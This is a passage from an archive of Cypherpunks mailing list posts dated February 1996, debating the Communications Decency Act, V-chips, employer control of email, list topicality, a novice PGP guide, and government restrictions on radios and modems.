> way they now screen it out with the movie rating.  Everyone is (more or
> less) happy.

Maybe the courts will rule that if people put an X-rated header flag on
their web pages then it's legal because concerned parents can have SurfWatch
block it.  The result of that would probably be that a large percentage of
sites would mark their content X-rated just so they are off the hook
legally, whether or not they really have anything pornographic.  But I can
live with that.

--                  xx
                    XXXXXXXXXXXXXXXXXXXXXx*####w
|~~ |  |  /~~ | /   XXXXXXXXXXXXXXXXXXXXXXx#####*       |~~ \  /  /\  |\  |
|~~ |  | <    |<    XXXXXXXXXXXXXXXXXXXXXXx*####o o     |-   ><  <  > | \ |
|   |__|  \__ | \   XXXXP"~~~~~~~~~~~~~~~    ""     o   |__ /  \  \/  |  \|
                    XXXXX:,                          o
                    9P^"',




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Sat, 10 Feb 1996 22:07:35 +0800
To: cypherpunks@toad.com
Subject: Re: Forgery--wasUnknown address
Message-ID: <2.2.32.19960210133829.006b7d48@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 09/02/96 -0800, David Sternlight wrote:
>
>I send this to you for your amusement and delectation. The core message
>below, about plonking, is a crude forgery--I did not write it nor did I
>send it.
>

I got one of these, too. My assumption was/is that somebody forgot to sign
off the list before their account was closed down.

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 10 Feb 1996 22:35:33 +0800
To: cypherpunks@toad.com
Subject: V-chips, CC, and Motorcycle Helmets
Message-ID: <960210090710.20214ab9@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim rites:
>The viewer sets her preferences: a 5-5-5 would let everything through, etc. 
>The developer of the chip claimed he could mass produce the chip for a buck, 
>and this may be where all those estimates of "$1-2 per set" have come from. 

Am in favor of this since it puts the control in the hands of the property
owner. One question would be "how often is the V-rating code transmitted ?"
(are the kiddies protected from channel-surfing ?) Do suspect that the $1-$2
cost could be met *at the manufacturing level*.

Do also see the need for regulation to put it in. It was required for UHF
channels else no one would try to build one. I am also thankful that is was
required for closed-captioning even though my TVs are not new enough (have
a $99 discount-house box on the TV in the family room. Makes many shows
more relaxing. Only annoyance is that we have to be even faster on Jeopardy
since the caption appears before the players speak.

Motorcycle helmets (required in Florida as is seat belt use) are another 
matter. Requiring the lights to be on is different - that makes the bike
easier for others to see. Helmet and seat belt laws are purely economic
in nature: the state wants them to reduce the load on the state supported
medical structure, motorcycle manufacturers (and auto manufacturers) support
them to keep insurance rates low (high insurance rates affect sales).

In this case the laws are "special interest" and have nothing to do with
the individual though the rationale is often "for your own good" (have been
wearing seat belts and helmets for many years - have a scar on my forehead
that took fourteen stitches where the Snell approved Bell Magnum helemet
*split* under the impact - sudder to think what the effect would have been
without it.

Similarly, I do not like air bags since I worry about second and side impacts.
Still was an easy way out for the manufacturers to appease the insurance 
companies (see above).

Getting a bit far afield from cyphers though. Bottom line is that the V-chip
seems like a good idea to me so long as the 5-5-5 setting is the default
and there are no "backdoors".
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 10 Feb 1996 23:02:40 +0800
To: cypherpunks@toad.com
Subject: "Rights"
Message-ID: <960210093506.20214ab9@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>A day or so ago, I reasoned incorrectly that university students and
>employees were free to encrypt mail they sent through their student or work
>accounts.  This was in response to a statement that the govt could retain
>at least some control of internet traffic through the universities and
>businesses.  I would credit the person who called me on it, by I do not
>remember who it was.  It seems that, at least for employees, it is totally
>up to the employer.

Is something I have been saying for years & has nothing to do with "free
speech", rather it is "property rights" and in the USA they always *must* win
because when you get down to it the US is based on property rights. One
of the most basic is that "citizens are not the property of the state".

"We hold these truths...all men are created equal" referred to the separation
of nobility from the "common man". Is part of the reason Amurricns may not be
titled. However computers and networks are not people, they are property. All 
are owned by someone who exercises control over them. To say "you must let me 
use yours as I wish" is to deny "all men are created equal" (and coporations 
enjoy the legal fiction of being an entity. Some time in the future we may 
have to consider other beings (porposes ?) but not yet just as at one time 
slaves and "injuns" were conveniently denied.

Now if an employer/university choses not to exert any control, that is their
decision but does not mean they have given up anything (AFAIK "adverse 
possesion" has never been applied to a computer or network) so why be surprised
when some exercise those rights ? I agree that proper notice should be given
but that is only to stay out of court in the first place. *Every court case
I know of has been decided in favour of the property owner*.

Remedy exists. If you do not like the rules at one site, choose another. In
most places you can find a PPP provider for $20/month unmetered who will let
you do what you will. True, if you want to use the web properly, the price of
a PC has gone up from $25 since Windoze and a 256 colour display is needed,
but not much.

Sorry for being a bit off topic but once this is understood (and am open to
argument on the issue but expect to prevail), I suspect that a lot of the
noise level on this list will go down.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Sun, 11 Feb 1996 03:11:58 +0800
To: cypherpunks@toad.com
Subject: This is not...
Message-ID: <199602101811.KAA01416@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Lemeur Alexanderpunks, or perryrants vs. perryisanasspunks,
or CDAisdumbpunks, it's CYPHERpunks. Could everyone please
get closer to back on topic, there is work to do. Rant at
congress, not here!
XYZ






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 11 Feb 1996 00:36:51 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security)
Subject: Re: "Rights"
In-Reply-To: <960210093506.20214ab9@hobbes.orl.mmc.com>
Message-ID: <199602101615.LAA11603@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Remedy exists. If you do not like the rules at one site, choose another. In

What happens when there *is* no remedy, when there are no other sites to 
go to, when there are no employers who would refrain from violating an 
employee's privacy?  What then?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sat, 10 Feb 1996 18:45:53 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: American Reporter on CDA 2/8/96 (fwd)
In-Reply-To: <Pine.SUN.3.91.960209172229.6630C-100000@dorsai>
Message-ID: <Pine.SUN.3.91.960210102731.15612A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


What a splendid article!  I will keep it on disk forever.

Sean Gabb.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 11 Feb 1996 03:54:07 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Req. for soundbites
Message-ID: <199602101827.KAA16020@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>A local TV station has asked me for an interview, after I sent a graphic
>of a mono-digital hand gesture with the phrase "censor this!" to the Prez,
>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio
>station), accompanied by a 'confession' and demand for swift prosecution.
>
>Anyone got any nifty sound bites I can try to toss in?

"Give me the liberty to know, to utter, and to argue freely according to
conscience, above all liberties."

"Though all the winds of doctrine were let loose to play upon the earth, so
Truth be in the field, we do injuriously, by licensing and prohibiting, to
misdoubt her strength.  Let her and Falsehood grapple; who ever knew Truth
put to the worse, in a free and open encounter?"

Both are John Milton, Areopagitica (1644)


And theis .sig:
Arun Mehta, B-69 Lajpat Nagar-I, New Delhi-24, India. Phone 6841172,6849103
amehta@doe.ernet.in a.mehta@axcess.net.in amehta@cerf.net
http://mahavir.doe.ernet.in/~pinaward/arun.htm
"I do not want my house to be walled in on all sides and my windows to be 
stuffed. I want the cultures of all the lands to be blown about my house 
as freely as possible. But I refuse to be blown off my feet by any."--Gandhi

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 11 Feb 1996 00:14:37 +0800
To: cypherpunks@toad.com
Subject: Why ? You really want to know =>
Message-ID: <960210103932.20214ab9@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>> The Administration has repeatedly stated its belief that those parts of 
>>the bill are unconsitutional, and does not intend to enforce them. 

>So why the fornicate did they include them? What's the point of passing 
>laws that they say they're not going to enforce, unless it's either to 
>enforce them later, or soften up the public for something _slightly_ more 
>tolerable later.

If you already knew the answer, why ask ? It also could be that under our
system of laws, once a rider is attached to a bill (in this case the
telecommunications bill) it is almost impossible to remove. Congress has
been using this quirk to provide pork-barrel & special interest thingies
for years.

I would prefer to think that some, realizing the impossibility of removal,
increased it to the point of obvious unconstitutionality so that it would
be separated as soon as possible. I suspect that both the three-judge special
panel and the following supreme court decisions are already known and time
is just needed to craft the SC decision so finely that this never happens
again. (ever the optomist but believe that while the congressional agenda
may be different and unobvious, it is rarely stupid.)

- Pick almost any chapter in the Old Testament. Read it halfway. Look at
how the famous figures look *at that point*. Just do not quote the "Song of
Solomon" (KJV) on the net. Today.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 11 Feb 1996 04:04:19 +0800
To: cypherpunks@toad.com
Subject: [silly] Re: OK, how *do* you spell it?
Message-ID: <2.2.32.19960210184124.0091cac0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM 2/10/96 -0500, Robert Hettinga wrote:
>I got a spelling ping this morning.
>
>I'd never really thought about it, before.
>
>Is it infocalypse or infoclypse?

It is Infocalypso.

Infocalypso is a new dance involving laptops.  It is similar to clog
dancing, except the laptops are hit together in a rhythmic fashion while a
lively beat is played on magnetic drums.  It is usually found in countrys
which have alot of spare laptops.  It was made popular during certain MIT
social gatherings and EFF meetings. The dance has gotten more and more
violent as the speed of laptops have increased.
  
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sun, 11 Feb 1996 02:24:49 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <199602090618.WAA24316@ix13.ix.netcom.com>
Message-ID: <199602101726.LAA00945@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> said:

SS> The Administration has repeatedly stated its belief that those
SS> parts of the bill are unconsitutional, and does not intend to
SS> enforce them.

	Then why didn't the Prez announce that he was ordering the
Justice Department to not defend the CDA provisions, like he did the
AIDS expulsion provision in the military spending bill?

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Sun, 11 Feb 1996 02:37:13 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: OK, how *do* you spell it?
In-Reply-To: <v02120d0ead427dec1e3e@[199.0.65.105]>
Message-ID: <311cd7256d77002@garnet.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga said:
> 
> I got a spelling ping this morning.
> 
> I'd never really thought about it, before.
> 
> Is it infocalypse or infoclypse?
> 

I think the former is the common spelling.

-- 
Kevin L. Prigge         | "You can always spot a well informed man -
UofM Central Computing  |  his views are the same as yours."  
email: klp@tc.umn.edu   |  - Ilka Chase 
PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Feb 1996 03:14:55 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <ad421d9c3c0210041e11@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:07 PM 2/10/96, "A. Padgett Peterson, P.E. Information Security"
<PADGETT@hobbe wrote:
>Tim rites:
>>The viewer sets her preferences: a 5-5-5 would let everything through, etc.
>>The developer of the chip claimed he could mass produce the chip for a buck,
>>and this may be where all those estimates of "$1-2 per set" have come from.
>
>Am in favor of this since it puts the control in the hands of the property
>owner. One question would be "how often is the V-rating code transmitted ?"
>(are the kiddies protected from channel-surfing ?) Do suspect that the $1-$2
>cost could be met *at the manufacturing level*.

This is what I said, that maybe the _chips_ could be made for $1-2, but
integrating them into systems (VCRs, t.v.s,  tuner cards for computes--did
you think we'd let Little Johnny evade the V-Chip by using one of those
tuner cards?) will likely cost 20-40x more, based on the usual cost
factors.

The Canadian V-Chip prototype was shown sending out V-Chip codes
"frequently" (seconds or faster), so Little Johnny might see a flash of
thoughtcrime, but not much more.


>Do also see the need for regulation to put it in. It was required for UHF
>channels else no one would try to build one. I am also thankful that is was

The whole "mandatory UHF" thing was utter nonsense from the gitgo. In
nearly all commercial markets (big cities) there are but a few UHF channels
being used, and in most places none are being used. Meanwhile, unused VHF
spectrum exists.

As someone else posted recently, the "market" solution gave us
"cable-ready" sets and VCRs without government/FCC regulation.

>required for closed-captioning even though my TVs are not new enough (have
>a $99 discount-house box on the TV in the family room. Makes many shows

Well there you have it. Many of the poor clearly are not buying new sets
that have closed-captioning. Meanwhile, we all pay for it when we buy new
sets and VCRs. A hidden tax, that does not benefit those in need. (I'm not
a tax strategist, and consider taxes to be theft, but if I were to design
such a tax, I'd just steal the money "fair and square" and then pay the
$100 or whatever to the deaf--excuse me, "the alternately soundspaced"--to
subsidize an external closed-caption decoder. Of course, this would leave
the broadcasters, and under no circumstances would I insist that they CC
their programs, and thankfully the law does not now require them to.)

ObCypherpunks: A truly surprising number of people on this list are on the
one hand lambasting the government for thievery, incompetence, corruption,
and violation of their rights, while on the other hand explaining why they
think some particular intrusion is justified. We have people arguing for
mandatory V-Chips, for Data Privacy Inspection Services, for
anti-discrimination laws, and for government key signing services.

It's not a far jump from arguing any of these points to talking about the
"legitimate" (their term) needs of the government to ensure that encryption
is not used for criminal purposes, for kidnapping and extortion, for tax
evasion, etc.

People need to think about the powerful implications of strong crypto, and
decide if they are _for_ access to strong crypto by citizens, or _against_
it. All things follow from this decision.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Rich Artym" <rartym@galacta.demon.co.uk>
Date: Sun, 11 Feb 1996 01:08:19 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy
Message-ID: <199602101157.LAA00451@galacta.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <199602070213.UAA03036@einstein.ssz.com>, Jim Choate writes:

> If the intent is to motivate others to kill or otherwise harm others simply
> because you don't agree with them or their actions is reprehensible and
> moraly or ethicaly undefensible.

I agree, but not for your reasons.  "Reprehensible" and "ethically
undefensible" both presupose that *you* can make an objective moral
judgement that you are right and others are wrong, which is no better
than the moral judgement that the politicians are making.  A better
reason for agreeing with your position is simply that value judgements
of any kind are subjective, and therefore they cannot apply to everyone
and hence it is a clear coercion to try to apply them to everyone.
Coercion of one man's subjective views onto another is the fundamental
fault in the position of the censors;  it's a very fundamental attack on
perhaps the most basic freedom we have, regardless of whether there is
a Constitution or Ammendments in the country in which we live.

> > 2.  How can we keep the government from banning encryption, digital
> > cash, and other systems that will improve our freedom?
> > 
>
> By making shure they don't have the authority to make the decision in the
> first place.

It might well be too late for that:  they've already taken the authority.
Now we're starting a process of taking it back, and we can do so without
bloodshed by moving the source of their power (monetary transactions and
the consequent taxation) beyond their reach.  That's where crypto comes in,
and that's why many of us are here.

> Every citizen of this country is a 'government employee' in one sense or
> another.

It is important that we adopt this overtly innocent view of civil servants
and governments as our *servants*, because it is on the grounds of service
that they justify their positions and actions on the single day every few
years that we get to vote them in.  Shoving the term "servant" down their
throats at every opportunity is an excellent attack on their positions of
power over us.

Rich.
-- 
###########  Dr. Rich Artym  ================  PGP public key available
# galacta #  Internet: rich@galacta.demon.co.uk     DNS 158.152.156.137
# ->demon #            rich@mail.g7exm[.uk].ampr.org   DNS 44.131.164.1
# ->ampr  #  NTS/BBS : g7exm@gb7msw.#33.gbr.eu
# ->nexus #  Fun     : Unix, X, TCP/IP, OSI, kernel, O-O, C++, Soft/Eng
# ->NTS   #  More fun: Regional IP Coordinator Hertfordshire + N.London
###########  Q'Quote : "Object type is a detail of its implementation."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 11 Feb 1996 01:19:21 +0800
To: cypherpunks@toad.com
Subject: OK, how *do* you spell it?
Message-ID: <v02120d0ead427dec1e3e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I got a spelling ping this morning.

I'd never really thought about it, before.

Is it infocalypse or infoclypse?

Cheers,
Bob

--- begin forwarded text

Date: Sat, 10 Feb 1996 10:22:47 -0500
To: rah@shipwright.com
X-URL: mailto:rah@shipwright.com
X-Personal_name: David R. Conrad
From: ab411@detroit.freenet.org
Subject: Spelling glitch

Robert,

   On the e$ home page, "Infocalypse" is misspelled "Infoclypse".

Regards,
--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee : finger -l conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 11 Feb 1996 02:34:45 +0800
To: cypherpunks@toad.com
Subject: Witness Protection Program
Message-ID: <199602101734.MAA28690@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT Sunday magazine tomorrow has a longish article on the 
federal Witness Protection Program. It traces in detail one 
family's entry, the arrangements for the "death" of the old 
identity and the new "birth," and describes the unsettling 
nymity transformation.


It also lays out the ballooning cost of a program once thought 
to be relatively cheap.


Some techno stuff about carefully orchestrated communication 
between the relocated family and relatives.


Is everyone in the galaxy still able to get free and easy 
access to the NYT Web site at:


     http://www.nytimes.com


?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sun, 11 Feb 1996 03:14:23 +0800
To: cypherpunks@toad.com
Subject: Re: Nyms with keys
Message-ID: <9602101810.AA22714@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  Perhaps while you're lurking, you should consider downloading and
installing a more recent version of PGP than version 2.4 which you're still
using.

At 05:24 PM 2/10/96 UTC, deadbeat wrote:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I mostly lurk these days. 
>
>DEADBEAT <na5877@anon.penet.fi>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.4
>
>iQBFAgUBMRwQdPFZTpBW/B35AQH+7wGAss68V8aPaLMra/yLHtk5CpO2Zt8Yp7B1
>qZKr+hOVJmphvZFmC7UmEk8TZu7a1GTY
>=zI0k
>-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sun, 11 Feb 1996 03:35:17 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <9602101815.AA22921@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 2/10/96 -0600, Sten Drescher wrote:
>
>	Then why didn't the Prez announce that he was ordering the
>Justice Department to not defend the CDA provisions, like he did the
>AIDS expulsion provision in the military spending bill?

   Because it's an election year and, IMO, the topics he discussed in his
State of the Union address gave a clear message that he was going to sign
this bill.


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 11 Feb 1996 04:17:51 +0800
To: allyn@allyn.com (Mark Allyn)
Subject: Re: Yeah, Yeah But what are we gonna do!
In-Reply-To: <199602100157.RAA26060@mark.allyn.com>
Message-ID: <199602101817.NAA11972@homeport.org>
MIME-Version: 1.0
Content-Type: text


Spam beget filters.

Most congresscritters delete email from people other than their
constituents already.

Adam

| I am going to volunteer to try to make a perl script that 
| I will make available that will automatically email every
| congressman that has an email address. I will include a pre

| What do you think? Is this worth it?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce A. Baugh" <bruce@aracnet.com>
Date: Sun, 11 Feb 1996 05:59:29 +0800
To: cypherpunks@toad.com
Subject: Privacy Without Tears
Message-ID: <199602102136.NAA11894@trapdoor.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Since it wouldn't do me any good to write code (I've _seen_ my code, it's not 
pretty), I'm writing in English instead. :-)

I've started work on what I currently call Privacy Without Tears, a guide to 
PGP and related programs pitched specifically at a novice audience. I would 
appreciate comments, particularly in the fact-checking line (more on this in 
a  moment). I'd also appreciate anyone who feels like it passing the URL I'll 
give in a moment on to crypto newbies and seeing if they can follow the 
instructions and get good results.

So far, I've only written an intro and a section on PGP. Now I'm working on 
a section on DOS and Windows front ends.

I'm only discussing software I can actually use on my own system, so 
explaining to me about the merits of tools for other OSes won't do any good. 
But if you have useful information about such, I'd be happy to link to your 
pages. Likewise, I'm deliberately not getting in a number of technicalities 
up front - only in the last section, for instance, will I explain about IDEA's 
role in PGP keys. This is for _novices_, the people who have as much need to 
protect their privacy as any of us but fewer clues.

One thing I could really use is a short - paragraph-length - discussion of 
probable times to crack keys of various lengths.

The URL (for the moment):

http://www.aracnet.com/~bruce/privacy/privacy.html

Thanks in advance for constructive comments!

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEQAwUBMR0Phn3AXR8sjiylAQGkMgfRAcH5qowi9wG/4o2cYR0qwlNXZM92TLJJ
G8Klpk//5Hd3q5PAdz6QOL3ct7QYhlpjlT/UYrJ/dhjpIxWX6jmgxM0jTDdDr1q8
qXcWwzNMz5d1V0z+95NkD7hCOV7inP5ycqFRRPtAgF4LCiT4V0GrbaTLaqKbi7G+
1YXo6ginBOjQ8WABRtpwIgGbxmJPQmTue5SqTX6zuGhTGrounCGShYZKT8ViLqtl
swtD6sG6TPCAOpAgeV8TOPnJEKdbd9ASHAFdEN63DnTHNgjUWLo2bO3VcblRHVjf
1fi+UkeEF/yYXD4nryhhA8E95GUqBdIasN2E8J214Wp4Qoo=
=5fO2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 11 Feb 1996 04:46:52 +0800
To: cypherpunks@toad.com
Subject: Re: China
In-Reply-To: <199602101429.BAA22868@suburbia.net>
Message-ID: <4PJ4iD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Julian Assange <proff@suburbia.net> writes:
> [...]
> > bottle. Remember that starting this year, satellites of Iridium and other
> > LEO satellite projects will start to go up, spreading bandwidth around
> > the world. How will the Chinese government build a firewall against
> > satellites? Say, for instance orbiting anonymous remailers with pgp? Will
> > happen some day.
>
> Radio *reception* of non goverment approved frequences is illegal in a
> number of countries, China included. Possesion of the equipment needed
> to received these frequencies is also illegal in a number of countries
> (including Australia). Sale of that equipment is illegal in still more
> countries, including the USA.

Governments and organized religions sought to regulate book printing
almost since the time in was invented.

In the last few decades, oppressive governments controlled the possession of
short-wave radio receivers (confiscated by several sides during WWII to prevent
citizens from listening to enemy propaganda); xerocopiers and computer
printers; even typewriters (I read that in today's Iraq every typewriter must
be registered and the government must be supplied with type samples).

It's not difficult to imagine that governments will seek to regulate the
possession of modems again. Some may recall that in the U.S. it used to be
technically illegal to connect a modem to the phone jack without a permission
from AT&T.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 11 Feb 1996 03:51:57 +0800
To: cypherpunks@toad.com
Subject: WEB: Heterodoxy Bashes MIT and Internet
Message-ID: <199602101855.NAA22791@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Very little cpunk relevance. I bash Heterodoxy for bashing MIT and the
Internet at

http://yakko.cs.wmich.edu/~frogfarm/hetrant1.html

Also available at alt.wired and talk.politics.libertarian.

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Feb 1996 05:31:54 +0800
To: cypherpunks@toad.com
Subject: This is not "This-is-not-punks" either
Message-ID: <ad423d483e0210048f00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:11 PM 2/10/96, Mixmaster wrote:
>Lemeur Alexanderpunks, or perryrants vs. perryisanasspunks,
>or CDAisdumbpunks, it's CYPHERpunks. Could everyone please
>get closer to back on topic, there is work to do. Rant at
>congress, not here!
>XYZ

Is anyone stopping you or anyone else from talking about quadratic
residues, or Fiat-Shamir protocols, or the IETF proceedings? I didn't think
so.

People talk about what is on their mind. This week it's the CDA, a while
back it was Jim Clark, and at various times we have talked about a truly
vast number of subjects. Sometimes we talk about C code (not often), often
we repeat ancient conversations about random numbers and steganography, and
very occasionally we get into a new topic. This is not surprising, echoing
as it does the patterns of conversations in real life.

The scolding by people who think things are "off-topic" is not
constructive. If they think people should be talking about some topic they
consider more appropriate, let them start talking about it.

Crypto is a hard subject, the technical part of it. If the list confined
itself to this subject, very little discussion would take place. A Wei Dai
might announce a new package every few months, someone might ask whether
IDEA is better than Blowfish every couple of weeks, and maybe a Hal Finney
would note that his analysis of RC4 is complete. Not much discussion, given
the "depth" of these subjects.

(And isn't sci.crypt a much better place for these discussions anyway? Why
have the Cypherpunks mailing list at all if the only "appropriate" topics
are those that duplicate what is already going on in sci.crypt?)

Finally, I am always struck by how the most consistently scolding folks
here ("Can't we get back to crypto?") are also the ones most prone to going
off on their own rants when the mood hits them. Perhaps this is what they
fear--the fear that someone else will say something that *must be rebutted*
and thus cause them to go off on their own rant! Instead of ignoring the
words that bother them, they declare that a topic is not suitable.

Worse, they even engage in what psychologists call "magical thinking": they
confuse cause and effect and claim that the actions of others will "cause"
bad things to happen. We see this is the stupid comments along the lines of
"I hope you're happy when the NSA wins, all because you made the list talk
about Vince Foster instead of DES!!!!"

People will talk about what they want to talk about. The way to shift the
focus to what you think should be talked about is to write interesting and
persuasive posts, not decry the topics others think important.

The best way not to have the list "sidetracked" is to not respond to things
you think are off-topic.

Another version of this plaintive wail about topicality is the repetition
of that comforting mantra "Cypherpunks write code." Overused in the extreme
(though based on good ideas, that actually implementing systems is more
interesting and more world-changing than merely discussing theory), this is
used by people who wish others would shut up about some subject. As a way
to have the last word. Sort of like writing, "As I've just finished
explaining to you dullards in this 5-page post about why the Jacobins were
actually proto-Libertarians, I must repeat that "Cypherpunks write code."
So I now ask must ask you to accept what I have written on the French
attitude toward libertarianism and get back to what this list is really
about. If you continue to argue with me, you will be doing the NSA's work
for them." (There's that magical thinking again.)

(Why anyone would want others to shut up is beyond me...this is what
filters are for. Anyone who can't filter out messages, either directly or
